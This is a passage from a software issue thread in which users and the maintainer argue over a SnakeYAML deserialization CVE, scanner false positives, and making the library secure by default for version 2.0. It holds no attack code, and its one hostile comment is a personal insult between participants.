    I do think that this tooling could improve by recognizing secure use of the library and not alert (or alert at a lower risk level) and to be more reasonable about the relative evaluation of the risk of this library compared with others (e.g. is this really nearly as big a concern as log4shell as the 9.8 rating would indicate?), but that may be asking too much for tools that are built to support a wide variety of languages which can use libraries in many ways.

    I am glad to see that the 2.0 pending version of the library will be more secure by default.

  98. Andrey Somov

    @Caleb Ciampaglia you probably did not know SnakeYAML before this mega false positive happened (do you import any SnakeYAML classes ?). The issue is the low quality tooling makes noise NOT pointing the code which is using SnakeYAML. When you simply use SnakeYAML for your configuration you are safe (if you use Spring to parse the configuration, you are double safe).
    The knowledge and understanding about the very poor quality of the tooling should be known and recognized.
    They should loose the trust and radically improve the quality to get it back. Your argument “we are asking too much from the low quality tooling“ should not be accepted.

  99. Caleb Ciampaglia

    @Andrey Somov from what I see from services like Mend (Whitesource) is that they alert based on the use of dependencies that match dependencies with CVEs associated with them. I have been assuming that you view this as “low quality” because they are not considering that the way those dependencies are used could be safe (and therefore the CVE does not apply to that solution). Is that correct or am I misunderstanding what you mean by “low quality tooling”?

    If I am correct, then your argument does not apply since those tools do not look at any code at all. They are judging the dependency not the code using the dependency.

  100. Andrey Somov

    @Caleb Ciampaglia exactly. That is why they provide low quality. Instead following the CVE (which DOES specify the correct/incorrect usage and the context) the low quality tooling creates false positives and causes a lot of time waste. The community should understand that the alarms are false and they should be carefully filtered out and ignored.

  101. Ava Adore

    But well, according to the CVE the problem is that the secure way is not the default. And this is correct. The “low quality tooling” is now just looking at the CVE database, finds that CVE and reports it. That’s what it was made for, so it does exactly what it is supposed to do. I don’t see low quality in that.

    Now you expect the tooling to look at the code which integrates the library, and expect the library consumers to work around the issue by using other constructor (or whatever), if they haven’t done so. That’s at least a very painful way to go, because of the many parties who are involved. You see alone in this thread how much confusion and discussion it creates. I think it would be easier if you made the secure way the default. Just one small change on your side, version bump, and that’s it.* No more confusion… It would make the CVE happy, then the “low quality tooling” would be happy, and all your library consumers too. Very few of them might need to migrate for the new version, the majority just increases the version number in their dependency management, and that's all.

    * BTW, you could delegate the SafeConstructor to the new default (safe) constructor and mark it as deprecated. Then it is still there and does the same for those who already use it. Just an idea… in case you weren’t thinking of that already.

  102. Andrey Somov

    @Ava Adore please read the CVE. It says NOTHING about the default. This is your own interpretation. They say “We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization.“ - this is already the case for Spring and Spring Boot. You are here most probably because you use Spring.
    Why the low quality sent you here even though you are explicitly not affected ??? Why the Spring users are affected and they ask for any change ? Why the low quality tooling does not want to improve it ?

    Please be aware that simply using SafeConsturctor does not solve the issue. Because the usage may still instantiate any class - it is a choice of a developer (user). Please also be aware that even the other Consturctor is used, it may be safe - the developer may choose the policy to create a class.
    It all depends on the usage and the context, not on the version and the default. The default is only for a very small part of users who really blindly take YAML files (not a single use case is reported so far)

  103. Ava Adore

    They say “We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization.

    That, in turn, is your interpretation.

    Why the low quality sent you here even though you are explicitly not affected ??? Why the Spring users are affected and they ask for any change ? Why the low quality tooling does not want to improve it ?

    We get lots of such reports from those tools about many other libraries on an almost weekly or monthly basis. That’s why I am here, I usually follow up on these reports and look for new versions that fix the issues. And in almost all cases this is done and there is a new version at some time, which obsoletes the CVE. In the very rare cases, when it is not done, the library has usually been abandoned and there is no maintainer. In that case we try to substitute or remove it.

    The default is only for a very small part of users who really blindly take YAML files (not a single use case is reported so far)

    Yes, and exactly that is the problem. Not a single use case reported does not mean that there is no use case… it just means that the users have no problem to report, because it “works” for them. In that regard, this might be the majority of your library consumers and you just don’t know it.

    However, the security breach comes later, when they don’t even remember anymore that it “just worked”.

    Please also be aware that even the other Consturctor is used, it may be safe - the developer may choose the policy to create a class.

    I understand that. But couldn’t the policy be restrictive by default?

  104. Andrey Somov

    Wow. I sited the doc and you call it “interpretation“? You completely changed the meaning of the CVE. Your statement is for sure the interpretation.

    I understand that. But couldn’t the policy be restrictive by default?

    Why ? to satisfy the low quality tooling ? there is no other reason, those who might be affected can fix it now.
    The fix is SOLELY to shut the low quality tooling up

  105. Caleb Ciampaglia

    @Andrey Somov , I think you misunderstand the purposes of the tools. Dependency reviewing applications (like Mend) do not review code and just review dependencies for potential use of libraries with concerns (security or licensing). SCSA applications (like Fortify, SonarQube) scan code for security and quality. I agree with @Ava Adore in that it is inaccurate to call the first class of applications “low quality” because they do not conduct scans like the second – they serve different purposes.

    I think you have a valid argument to make against the application of the CVE to snakeyaml because the library provides a secure way of interpreting YAML files. So, following that argument, they should test every consumer of snakeyaml and raise a CVE on those that are able to load unexpected classes by not using that secure code (and the second class of tools, e.g. Fortify, would catch those that use the library directly). I think we can all agree that this would consume a tremendous number of resources to perform the testing, make the changes where needed, and verify the changes.

    In all other cases that I have read where this argument is made, the conclusion has been that the underlying library should make the secure path the default and make a developer need to take extra steps to use the library in a potentially insecure way. This is clearly the most effective way of closing this concern for nearly all uses of the library, which should be the goal of everyone involved (and especially the library authors – snakeyaml and consuming libraries).

  106. Ava Adore

    @Andrey Somov , you cited the subclause in the CVE, that suggests how to mitigate the issue. The main statement is:

    „SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution.“

    That’s where my and most other people‘s interpretation stems from (see the long discussion above)

    Why ? to satisfy the low quality tooling ?

    No, to make the library more secure even for those consumers who don‘t think security first. And don‘t read the docs in every depth before they start their implementation (most developers probably, including myself). If that means to force them to think security first, so be it. That wouldn’t be so bad at all…

    The fix is SOLELY to shut the low quality tooling up

    The CVE and tooling is just the messenger, who reported a problem. There is no value in shooting the messenger.

  107. Andrey Somov

    @Caleb Ciampaglia I think misunderstand the purpose of this issue. People come here because of a single reason - a false positive of low quality tools.
    What they may have said:
    We have detected a library which may be affected. There is a very specific context that you must check before jumping to any conclusions. If and only if (as the security researcher confirmed above) the context matches your use case, please take an action. Otherwise ignore the issue.

    Instead the low quality tooling pollute the reports with disturbing noise. If you remove the Spring users from the topic it would become empty.

    My point is not to disqualify the hard work by those who work on tooling, my point is to make the community aware that the issue is in the reporter not in the library. They should either dramatically increase the quality, or dramatically reduce the level of the danger.

  108. Andrey Somov

    The CVE and tooling is just the messenger, who reported a problem. There is no value in shooting the messenger.

    since you do not respect my time simply reading this topic, I see no point for further discussion with you.

  109. Caleb Ciampaglia

    @Andrey Somov , I still disagree with your term “low quality tools” (the tools are operating correctly and accurately) – perhaps the CVE should be worded differently.

    That being said, you did not address my comment about efficiently addressing the potential vulnerability (which is the primary goal of all of us). You can see here that snakeyaml is used in over 3600 known libraries (https://mvnrepository.com/artifact/org.yaml/snakeyaml/usages). Wouldn’t it make more sense to update the default way of constructing snakeyaml (Constructor class) to make it secure by default instead of asking the maintainers of all those libraries to make the changes or verify their use? The few consumers that need the ability to deserialize unexpected types can make the change to use something like UnsafeConstructor.

    The risk of having this vulnerability exploited is much higher if we depend on the maintainers of all those libraries to make a change vs snakeyaml making a change, right?

  110. Andrey Somov

    I still disagree with your term “low quality tools” (the tools are operating correctly and accurately) – perhaps the CVE should be worded differently.

    CVE is correct - it provides the exact information. This is what it is supposed to do.
    You do not answer my question - if the app is using Spring to parse internal configuration, do you consider this as a safe usage ? (and false positive from the low quality tooling)

    According to the CVE it is safe, according to the security researcher it is safe. What is your answer ?

    The risk of having this vulnerability exploited is much higher if we depend on the maintainers of all those libraries to make a change vs snakeyaml making a change, right?

    Of course NOT right. (Please first answer the above part.)

  111. BrendonMilton

    I already reported that this was an exploitable issue for my use case, where users were allowed to edit configurations (not spring configurations). I’m not sure why there are still claims that there is no use case where the vulnerability could be exploited, since I reported mine in this very thread.

    It is my fault for not reading the entirety of the of the documentation and the yaml spec to realize how powerful and easily exploitable the default constructor is, but I would not expect a library to use the most easily exploited mode of operation by default. I implemented my own fix now, but I’m glad that the 2.0 version will contain a whitelist solution so this won’t happen to other people.

  112. Andrey Somov

    @BrendonMilton sorry, I may have missed it. This is nice to know that all the storm of false positives helps a single use case which was already fixed (but the low quality tooling is still complaining)

  113. Anton Mostovoy

    @Andrey Somov You keep talking about “low quality tooling” as if using it is a choice. However, as far as I know, there is no “high quality tooling” that can accurately determine whether a given library is being used in a safe manner or not. Apps are way too complex for static analysis to determine this accurately. The only alternative is to do “defense in depth” + “secure by default”.

    As maintainers of mission critical apps, we simply dont have a choice, because even if I am able to review how every libraries uses every every other library today, it is not feasible to do that correctly every time any library is updated.

    To give you some analogies:

    Defense in depth: if you had some diamonds, you would want defend them in multiple layers. You wouldn't just try to secure the doors and windows in your house, and then leave them sitting on your dining room table. You would also put them into a safe.

    Secure by default: when you sell medicine, you put them into a child-proof container, so that it’s secure by default. Putting a label on it “Dont allow your babies to eat this” is not enough, because mistakes happen. Yes, it would be ideal if every parent was able to provide perfect oversight for their child, but it is not realistic to expect that. Moreover, even if the probability of this happening is low, the impact is very significant.

    Your claims about low quality tooling remind me of this old soviet joke: “A soviet bureaucrat is giving an interview and says ‘I invented a plane that will have 1000 seats!’. The journalist asks him ‘But how will it fly if it’s so large?' The bureaucrat replies “ah, the engineers will need to figure it out”.

    Perhaps, I am wrong and “high quality tooling” exists. Could you please share it?
    Otherwise, could you please explain what is the harm of making SnakeYAML secure by default?

  114. Andrey Somov

    @Anton Mostovoy well, I see the difference in the general direction. Initially it was (publicly and privately delivered to me)“your library has a bug, go and fix it.“ Just read the first statements and the first issues which were duplicates of this (it is easy to find them all)

    Unfortunately, you are right - I am not aware of anything which has capabilities to deliver better quality. 😔

    As maintainers of mission critical apps, we simply dont have a choice, because even if I am able to review how every libraries uses every every other library today, it is not feasible to do that correctly every time any library is updated.

    The worst thing to do is to trust this tooling.

    Secure by default: when you sell medicine, you put them into a child-proof container,

    To follow you analogy: Let us sell medicine, fruit, bread, sweets, stones, pencils etc ALL in a child-proof container. As a user of this quasi-tooling (unfortunately, the corporate security policy requires it) I try to filter out all the noise. The ratio false/true positives is unacceptably low. For sure less than 1%. Following your logic we should sell in a child p-proof container 100 times more goods to have similar situation. When everything is child-proof, than nothing is child-proof.

    I do my best to let the industry aware of the awful situation and the necessity to find a solution. Check all the other false positives which the tooling creates all time - do you expect forever waste you time for nothing ?

    I do not see a problem to release quasi“secure by default“. It was already implemented.

    Important: I assume that you are not affected at all, but you also waste your (and my) time for nothing

    P.S. Sorry, I did not quite catch the joke

  115. Patrick Heck

    I think a lot of frustration here stems from this:

    Unfortunately, you are right - I am not aware of anything which has capabilities to deliver better quality. 😔

    None of us know where to find such tooling either. Just demanding it probably won’t make it appear. I personally suspect the prospect of creating such tooling requires a highly general AI** which is thus far intractable (or not yet pubicized by whomever has invented it). If you can think of a tractable solution, please write it and probably a lot of us will pay you money for it. Then you can probably buy yourself a yacht 🙂 (or a bigger yacht?). Since it’s an unsolved problem, other workarounds are needed. Key strategies that I, and I suspect others, would find heart warming include:

    1. Ensuring that documentation, especially the simplest first example (https://bitbucket.org/snakeyaml/snakeyaml/wiki/Documentation#markdown-header-loading-yaml) is an example that provides maximal safety. (Reading this code:https://bitbucket.org/snakeyaml/snakeyaml/src/41adee630fb3d99fa4d232dab7202366d03a8bbf/src/main/java/org/yaml/snakeyaml/Yaml.java#lines-64 makes shows that the most basic example does not use the SafeConstructor() class mentioned above)
    2. Document the significance/tradeoffs/difference between using new Yaml() which internally does new Constructor(new LoaderOptions()) which now has a UnTrustedTagInspector() by default in the LoaderOptions object versus using SafeConstructor(). I fear there is some risk you are taking flack because your documentation is unclear, rather than your software unsafe.
    3. Class Javadoc that outlines the risks (none of Yaml, Constructor or SafeConstructor mention any safety issues in doc comments for either the class or the constructor. In the case of SafeConstructor it would be great if it documented what it is keeping the user safe from)
    4. Perhaps more controversially, shifting the implementation of the default Yaml() such that it uses SafeConstructor() UNLESS you pass an argument telling it to use a more permissive loading scheme, along with clear documentation identifying the risks associated with the more permissive scheme.

    Certainly SnakeYaml should continue to provide it’s valuable features, but in today’s world (the period between increasing security awareness and monitoring and the subsequent invention of high quality tooling), there is an increasing demand for security to be prioritized over convenience.

    Also note that the docs link to a broken link for a safe constructor example: https://bitbucket.org/snakeyaml/snakeyaml/src/tip/src/test/java/examples/SafeConstructorExampleTest.java

    ** General AI is probably required because the source of the incoming .yaml file is potentially only described in requirements or documentation, and may not be evident from the code itself and also needs to be traced through N levels of libraries in between. In a case I have (also not using spring) there are ways in which command line arguments might get written into a config .yaml that configures a dependency (an embedded Cassandra instance). The value will be used upon subsequent restart. That means anyone starting the program for the first time, can add content to the yaml that gets processed on every startup. In my case, not very risky and it is entirely tractable to mitigate with input validation. None the less, it is a small window that in other situations would possibly be problematic.

  116. Anton Mostovoy

    The joke was an example of someone in position of power prescribing a solution without thinking about its implications. I believe that is what you are doing when you are telling everyone “don't use low quality tooling”.

    The worst thing to do is to trust this tooling.

    If trusting dependency analysis is the ONLY thing that a company does to secure its application then I would agree with you. But most of the companies that are paying attention to dependency analyzers ARE practicing defense-in-depth. They are also using pen tests, vulnerability scanners and signal analysis. Just like you would not leave your safe with diamonds in your back yard.

    To follow you analogy: Let us sell medicine, fruit, bread, sweets, stones, pencils etc ALL in a child-proof container.

    This is an example of all or nothing logical fallacy. Who said anything about fruit, etc? It is not true that you should not make the library secure by default (or put medicine into child proof containers) just because it will not fix 100% of all cases.

    I do my best to let the industry aware of the awful situation and the necessity to find a solution.

    “Low quality tooling” is the current state of the art - we don't have an alternative. The current situation is not perfect, but 1) it is better then nothing; 2) you are not going to convince the management of hundreds of companies that they should do nothing because Andrew Somov doesnt think the current state of the art is not good enough. So the net effect is that you are just making life difficult for a lot of people, but since you are not proposing the alternative, nothing will change.

    Do you think that if I go to my CISO and complain that i cant use SnakeYML, they will change the policy? Do you think that our CEO will say “You know what, we should start a company that will find a solution to this technical problem”? I dont think so :) if anything, they will require that every version of every library has to be “approved” by the security team.

  117. Anton Mostovoy

    I do not see a problem to release quasi“secure by default“. It was already implemented.

    I think i missed this in the discussion. I do see that the master branch has the commit with comment “Do not allow global tags by default”. Thank for you making this happen!

  118. Timothy Lyanguzov

    The discussion will be closed immediately when SnakeYAML with secure by default is released and CVE is updated to indicate which version implements it. After this, there will be no people coming to this issue to read the comments and annoy you about your incorrect assumption of “low-quality tools”. Just release the safe by default version to stop this thread. You don’t have to wait until any other issue (not really important for security) is resolved.

  119. Andrey Somov

    but since you are not proposing the alternative, nothing will change.

    I do propose a solution:

    1. the low quality tooling gets finally the proper name and recognition
    2. the technicians understand that they should not trust the low quality tooling - it can only be used as a hint for investigation
    3. technicians help the security/management to accept that the tooling is not worth to pay the money until they radically improve
    4. low quality tooling will slowly (with the help of community, including myself) evolve and become high quality tooling
    5. people from the low quality tooling will hear my voice and they decide that they want to grow professionally (otherwise no one will pay the bill) - I am sorry, they do not have this excuse “Low quality tooling” is the current state of the art - we don't have an alternative.“

  120. Andrey Somov

    The discussion will be closed immediately when SnakeYAML with secure by default is released and CVE is updated to indicate which version implements it.

    1. My disappointment with CVE will grow - because the new version does not remove the vulnerability, it will hide it. If they simply remove it, it would mean that they will cause false negative (when the vulnerability exists but not detected). The good point is that false negatives are used by attackers, but they do not cause any issue in my issue tracker 😆
    2. I assume you are not affected at all, because if you are you could have solved it already (if you not need a release for that). You use SnakeYAML as transitive dependency. It means that the library which does use SnakeYAML has to be changed (The version 2.0 is not backwards compatible.). You cannot simply provide another version of SnakerYAML at runtime, it may or may not work. I already prepared a PR for Spring, but I am waiting.

  121. Ava Adore

    @Andrey Somov ,

    since you do not respect my time simply reading this topic, I see no point for further discussion with you.

    I am following this thread since mid December, shortly after the issue was created and long before I jumped into the discussion myself. I have read every post here and still do so. So it’s simply wrong to blame me that I don't read the topic.

    The only message I get from your posts here is, that you are stubbornly continue to insist on your complaining about the “low quality tooling”. Meanwhile others have added good points, so I can just follow up.

    What you demand is in the end, that a tool exists which scans the source code and detects insecure patterns (such as SQL injection, buffer overruns, XSS vulnerabilities and so on), and the insecure usage of any library that was included. This challenge can safely be classified as NP-hard, in other words, not solvable. Unless someone shows up and solves the millennium puzzle to prove that P=NP. Until then, only specific parts of the problem can be solved at all, maybe quite a few of them by optimization techniques like AI.

    For a specific solution, someone could implement a particular rule for a particular static code analysis tool, which scans the code for usages of the unsafe snakeyaml constructor (or other particular things). This rule would then apply to snakeyaml only, in a specific version only, and could be used only in a specific code analysis tool. Users of other versions of snakeyaml or other tools are out. So all consumers of your library must use that specific tool, and furthermore they must make sure that the rule is installed, set to a meaningful severity and its reports are not ignored… all possible breaking points. And a huge effort for such a small library.

    If an AI would be developed for the problem, the quality of this would depend solely on the training sets. Over time it could be helpful, but it would definitely take time. Not to forget that an AI, if it exists, could (and would) also be used on the dark side. So we have the same cat and mouse game as today, just on a different level.

    In the end the situation is at it is today and will not change in the near future. The best defenses against security threads are still the old common-sense ones, and it was already mentioned: be secure by default as best as possible. That is why programming languages exist, that simply don’t allow buffer overruns: because otherwise, buffer overruns will happen. The only way to truly prevent them in all circumstances is to use such a language. Yes, that doesn’t prevent other security issues, but it prevents a whole class of very dangerous ones.

    With the child analogy: you cannot put everything in safe containers, but you must do it for those items which can be really harmful - such as meds or pipe cleaners. Because you know that children taste everything and it will be dangerous if they try these items. And you know that exactly this has happened before. And you don’t want your child in the hospital because of such an accident, which could have been prevented by such a small and cheap measure as using a safe container! The same argument holds true for this case: you prevent RCI vulnerabilities in default constructors because you know that most developers will use the default in the first place, and because you know that RCI is harmful and has happened before.

  122. H

    Hi, I created an issue to response and give my opinion as an indirect user of SnakeYaml.

    Re: SnakeYaml as a transitive dependency

    I have control over a large (enterprise size) Java web-app with SnakeYaml as one of its transitive dependencies, not a direct dependency. The library that includes SnakeYaml has not upgraded its usage to the secure contructor, which means that its default is unsecure.
    Unknown when/if they will do that.

    I assume you are not affected at all, because if you are you could have solved it already (if you not need a release for that). You use SnakeYAML as transitive dependency. It means that the library which does use SnakeYAML has to be changed (The version 2.0 is not backwards compatible.). You cannot simply provide another version of SnakerYAML at runtime, it may or may not work. I already prepared a PR for Spring, but I am waiting.

    This is simply not true. It is trivial to put an upgrade snakeyaml dependency in the dependencyManagement section of our maven project and use the newer snakeyaml version together with the not-upgraded library. This ofcourse will only work if you do not make breaking changes in snakeyaml, like changing method signatures.
    But this method has worked quite well for minor version security updates in the past.
    At some point we can remove the entry in dependencyManagement.

    Not ideal for management, but it definitely works.

    This makes releasing snakeyaml 1.34 which changes the behaviour regarding whitelisting very useful for many enterprises.

    Re: Default behaviour

    In my opinion, if you strip away all emotions, and dig deep enough you end up with the root cause of this discussion:
    The default behaviour of snakeyaml (new Yaml() ) which you documented in examples is unsecure by default.
    One of the core design principes of OWASP is “Establish secure defaults” and a “Secure-by-default design”. In the current released version the simple fact is that new Yaml() is not secure.

    You can argue all you want about use-cases and people should use the other constructor (which one some level you may be right about in an ideal world), but there is still the fact that by having an unsecure default, people who are not as knowledgable as you may end up in trouble because snakeyaml was used insecurely.

    So, my plea is again: Make (and release) snakeyaml secure by default and make the world a slightly better (Java) place by doing so.

    Re: “Low quality tooling”

    You keep using that term, but I suggest you stop doing so. The current tooling you probably mean (SonarQube, VeraCode, Snyk) are definitely not perfect, but are a very good means to be aware of possible security issues.

    Even if they give 99 alerts which are not relevant for an enterprise (eg. like snakeyaml in many of our use-cases), the 1 enterprise where snakeyaml is an issue is definitely happy that they use the security tooling to catch it.

    So, from your perspective (as library author) the security tooling may be noise, but it definitely is not for larger enterprises.

    So, my suggestion here is: drop the bashing on those tools. They serve a purpose for many of us in large enterprises.
    You may not like what they reported, but when looking at simple facts, what they reported was true:
    An insecure default which MAY BE a problem when chained/used in a larger attack on a company.

    Last suggestion: You seem to be vary wary of this long-running issue.
    ”Giving in” to (other) expert opinions is not a failure on your part. But it will make the current problems and discussions stop right away…

    Just do it, release a secure-by-default version and observe the quiet afterwards…

  123. Andrey Somov

    Dear unknown H (I wonder why to choose such an informative name),

    I do not want to argue all the incorrect statements (I want to save my time), just a couple:

    This is simply not true. It is trivial to put an upgrade snakeyaml dependency in the dependencyManagement section of our maven project and use the newer snakeyaml version together with the not-upgraded library. This ofcourse will only work if you do not make breaking changes in snakeyaml, like changing method signatures.

    Please read the quote above yours - The version 2.0 is not backwards compatible. It DOES contain breaking changes

    Even if they give 99 alerts which are not relevant for an enterprise (eg. like snakeyaml in many of our use-cases), the 1 enterprise where snakeyaml is an issue is definitely happy that they use the security tooling to catch it.

    • when 100 people were sent to the prison and only was actually guilty - this is high quality
    • when you bought 100 computers but only 1 works - this is high quality
    • when the security personal stopped 100 visitors but only one actually stolen something - this is high quality
    • I work with the low quality tooling many years in many companies - my ratio is significantly less than 1%, less than 0.01%

    Why for the all businesses delivering 99% of false positives leads to a deadly end, but the low quality tooling can actually earn money ?

    We have different perspective, but when we do not demand, they do not improve. As simple as that.

    Just do it

    it sounds like a demand…

  124. H

    You choose to make a 2.0 with breaking changes, your choice. You an also choose to make a 1.34 with only 1 “breaking” change: the default constructor behaviour. So your choice does not invalidate my point.

    Furthermore, it’s really telling that you responded to all parts of my post, except the most important one, so I am going to repeat it:

    Re: Default behaviour

    In my opinion, if you strip away all emotions, and dig deep enough you end up with the root cause of this discussion:
    The default behaviour of snakeyaml (new Yaml() ) which you documented in examples is unsecure by default.
    One of the core design principes of OWASP is “Establish secure defaults” and a “Secure-by-default design”. In the current released version the simple fact is that new Yaml() is not secure.

    You can argue all you want about use-cases and people should use the other constructor (which one some level you may be right about in an ideal world), but there is still the fact that by having an unsecure default, people who are not as knowledgable as you may end up in trouble because snakeyaml was used insecurely.

    So, my plea is again: Make (and release) snakeyaml secure by default and make the world a slightly better (Java) place by doing so.

    BTW “Just do it” is not a demand, but a pretty common figure of speech. As you can read, it corresponds to the above (repeated part). I am confident that it will most things you dislike about the current situation, like people bothering you..

  125. James Nord

    The root documentation in the repository is misleading

    The only issue is when the data to parse comes from untrusted source - meaning it is downloaded from unknown source without authentication and authorisation.

    please do not mistake trust with for authentication & authorisation for trust - this is a root of confusion throughout this ticket.
    I may know that the source is coming from Joe Smith (as he has authenticated) - but that does not in any way mean that I wish to allow Joe to run arbitrary code (or any code) on my service.

    the link in https://bitbucket.org/snakeyaml/snakeyaml/wiki/CVE & NIST.md

    When you plan to feed the parser with untrusted data, please study the settings which allow to restrict incoming data.

    to “study the settings” results in a 404 https://github.com/google/oss-fuzz/blob/master/projects/snakeyaml/YamlFuzzer.java

    I assume you are not affected at all, because if you are you could have solved it already (if you not need a release for that)

    As an author of a service that does take and parse YAML from authenticated - yet untrusted users (where a user can be both a Human and 3rd party web service) I am confused as to what I should be doing to be secure given the documentation is scattered or missing.

    I’m sure it is annoying to have to respond to all these myriad of questions and comments - but what I think would help the majority here is a page that describes what you need to do when the YAML is untrusted.

    Does this exist in a single place that outlines what needs to be done and where?

    excepting a DoS (not talking about that here - just RCE) is new Yaml(new SafeConstructor()).load(stream) safe?

  126. Patrick Heck

    I made 4 suggestions, one of which we already have established as something you find controversial (changing default behavior). Do you consider updating documentation to be controversial too? Note that clear documentation of trade-offs between SafeConstructor() vs instantiations relying only on UnTrustedTagInspector() could actually make it clear why it is you think the current situation is good enough, and the rest of us are confused. It seems possible that there is a disconnect there wherein you know something the rest of us don’t appreciate. I should think you would be eager to write at least that documentation.

  127. Patrick Heck

    I am willing to help but a lot hinges on point #2 (tradeoffs of SecureConstructor() vs UnTrustedTagInspector() ) which you or someone with more detailed knowledge needs to write. One of the reasons I suggested that item is I don’t really understand it myself. That would inform any caveats that need to go with changes to the examples etc.

  128. Andrey Somov

    @Patrick Heck this is a very good question.

    The SafeConstructor is (and always was) very restrictive and it does not allow custom classes. You can see it in the tests. (neither loadAs() nor global tags can create instances of custom classes)

    Constructor will be provided with the kind of white list with the classes to be allowed to create.

    I see now that the API is inconsitent - SafeConstrictor does not respect TagInspector and Constructor can have the same functionality as SafeConstructor (which makes SafeConstructor redundant)
    Your proposal is welcome. It is not too late the change the API.

  129. Andrey Somov

    @Valentin Kolesnikov since you used it as transitive library, you did not take data from untrusted sources. It was clearly a false positive for you. On top of that, you probably do not use YAML at all. The less code is in your classpath - the better for the docker image.

  130. Arnaud Dagnelies

    Hi,

    I know I’m late to the party and I wanted to put my 2 cents in, since it appears there is a lot of confusion regarding this CVE and I hope to understand both sides. I also apologize in advance if I slightly miss the mark.

    The root of the issue is probably the misinterpretation that “it is safe by default”, while the sankeyaml advocates to use SafeConstructor for user provided input and the “poor CVE tooling” cannot distinguisish how the lib is exactly used, reporting “false positives”. It’s a perfect triangle where everyone is neither completely right nor wrong at the same time.

    It's what it is now. Even if Spring and co. use this library correctly and are not vulnerable, CVE detection tools simply cannot distinguish usage. It’s not a trivial task either.

    Perhaps if the Constructor was called PriviledgedConstructor in contrast to the SafeConstructor, and “deserialize/instaciate any class” was opt-in in yaml rather than the default, all of this would probably have been avoided. ...I think that's what triggered it all, the "default out-of-the-box usage", not how it's used "safely".

    It is very nice to hear that a version 2.0 which reverses this default is planned.

    Lastly, thank you very much for your time and effort in maintaining this software.

  131. David Wilson

    @Andrey Krautsou Thank you so much! I can guess how painful this whole discussion must have been. I really appreciate your work to placate the scanning tools. I hope security researchers can find a pattern that is less burdensome on open source developers like yourself and the others who have worked on snakeyaml.

    Thanks so much for 2.0.

  132. Hippocrates Llama

    @Andrey Somov You’re an asshole. How about being professional when you’re dealing with stuff and not saying things like “How the hell.”

    People like you ruin our community.

    I’m glad you finally realized that there was an issue. Just because YOU don’t understand something doesn’t mean you should be such a prick about it and talk down to people. I can guarantee you that there are many people here that are smarter than you, just like there are many that are smarter than me.

    Grow the fuck up.

  133. Andrey Somov

    @Hippocrates Llama thank you !

    • you hide your identity and I do not
    • you attack personally and I do not
    • you have created nothing, but I help to create and maintain SnakeYAML (you can prove the opposite, feel free)
    • it is sad that you still do not get the issue
    • People like you ruin our community

    Please do not pollute the issue tracker with your personal stuff. You have my e-mail to reply.

    Please let the community see its representatives.

  134. Log in to comment